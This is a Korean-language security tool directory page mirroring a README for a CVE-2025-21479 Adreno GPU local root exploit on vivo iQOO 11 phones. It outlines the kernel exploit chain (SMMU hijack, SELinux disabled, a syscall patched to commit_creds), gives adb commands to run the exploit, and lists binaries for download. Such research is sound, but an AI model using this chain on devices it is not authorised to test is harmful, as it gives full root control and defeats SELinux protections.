Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2025-21479-iqoo11pro — CVE-2025-21479 (Qualcomm Adreno GPU) vivo iQOO 11 Pro (PD2254) 재현 노트 - 승인된 연구 | Kitploit
도구/GitHubGitHub/xianwan1314/cve-2025-21479-iqoo11pro
Android SecurityPrivilege EscalationVulnerability AnalysisExploitationPost-ExploitationMobile SecurityHardware SecurityPayload DevelopmentBinary Exploitation

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubxianwan1314/cve-2025-21479-iqoo11pro

cve-2025-21479-iqoo11pro

CVE-2025-21479 (Qualcomm Adreno GPU) vivo iQOO 11 Pro (PD2254) 재현 노트 - 승인된 연구

저장소 보기
12120일 전아직 검토되지 않음

CVE-2025-21479 임시 Root (iQOO 11 시리즈)

버전

항목값
기기vivo iQOO 11 Pro (PD2254 / V2254A)
시스템Android 15, PD2254B_A_15.2.12.2.W10
커널5.15.178-g3dc7c01077b8-dirty
SoCSnapdragon 8 Gen 2 (SM8550 / kalama)
GPUAdreno 740, OpenGL ES 3.2 [email protected]

지원 기기

현재 방법의 제약으로 인해 런타임에 kallsyms를 추출하는 기능이 구현되지 않았으므로, 위 세 버전 외에는 이론적으로 모두 호환되지 않습니다.

참고 프로젝트

  • zhuowei/cheese (Quest 3/3S, Adreno 740)
  • ma4the/omae-wa-cheese-da (Galaxy Z Flip5, SM8550/Adreno 740 v675)

구현 흐름

root@kitploit:~
GPU spray (SMMU 페이지 테이블 하이재킹, 27개 후보 물리 주소)
  → 임의 물리 메모리 읽기/쓰기
  → SELinux enforcing → permissive (selinux_state 물리 쓰기)
  → patch __arm64_sys_vhangup (syscall #58, Android에서 호출되지 않음)
      GPU가 96바이트 stub 직접 쓰기 (commit_creds(prepare_kernel_cred(NULL)))
  → fork 자식 프로세스 → syscall(58) → uid=0
  → setexeccon: /proc/self/attr/exec = "u:r:shell:s0" 쓰기
  → exec root shell (uid=0, 도메인 = u:r:shell:s0)

실행:

root@kitploit:~
adb push exploit /data/local/tmp/exploit
adb shell
chmod 755 /data/local/tmp/exploit
cd /data/local/tmp && ./exploit

구현 예시

Root 권한 관리:

root@kitploit:~
find /data/app -type d | grep resukisu
/data/app/***/***/lib/arm64/libksud.so insmod kernelsu.ko

주의 사항

  • 임시 root: 현재 shell에서만 유효하며, 종료 후 다시 exploit을 실행하여 권한을 상승시켜야 함
  • GPU spray는 확률적 과정으로, 기기 상태가 좋지 않으면 실패할 수 있으므로 기기 재부팅 후 재시도
  • 지원 기기 목록에 있는 Android 15 펌웨어에만 적용 가능하며, 다른 버전은 검증되지 않음

면책 조항

본 프로젝트는 보안 연구 및 학습 목적으로만 사용되며, 반드시 본인 소유의 기기에서만 테스트하십시오. 사용자는 본 프로젝트 사용으로 인해 발생하는 모든 결과(기기 손상, 데이터 손실 등을 포함하나 이에 한정되지 않음)에 대해 스스로 책임을 져야 합니다. 본 프로젝트를 어떠한 불법적인 용도로도 사용하지 마십시오.

도구 다운로드
기기펌웨어커널바이너리
iQOO 11 Pro (PD2254)PD2254B_A_15.2.12.2.W105.15.178-g3dc7c01077b8-dirtyexploit_11pro
iQOO 11s (PD2304)PD2304B_A_15.2.12.1.W105.15.178-g844f85161cd7-dirtyexploit_11s
iQOO 11 (PD2243)PD2243B_A_15.2.16.1.W105.15.178-g0ae61da50a34-dirtyexploit_11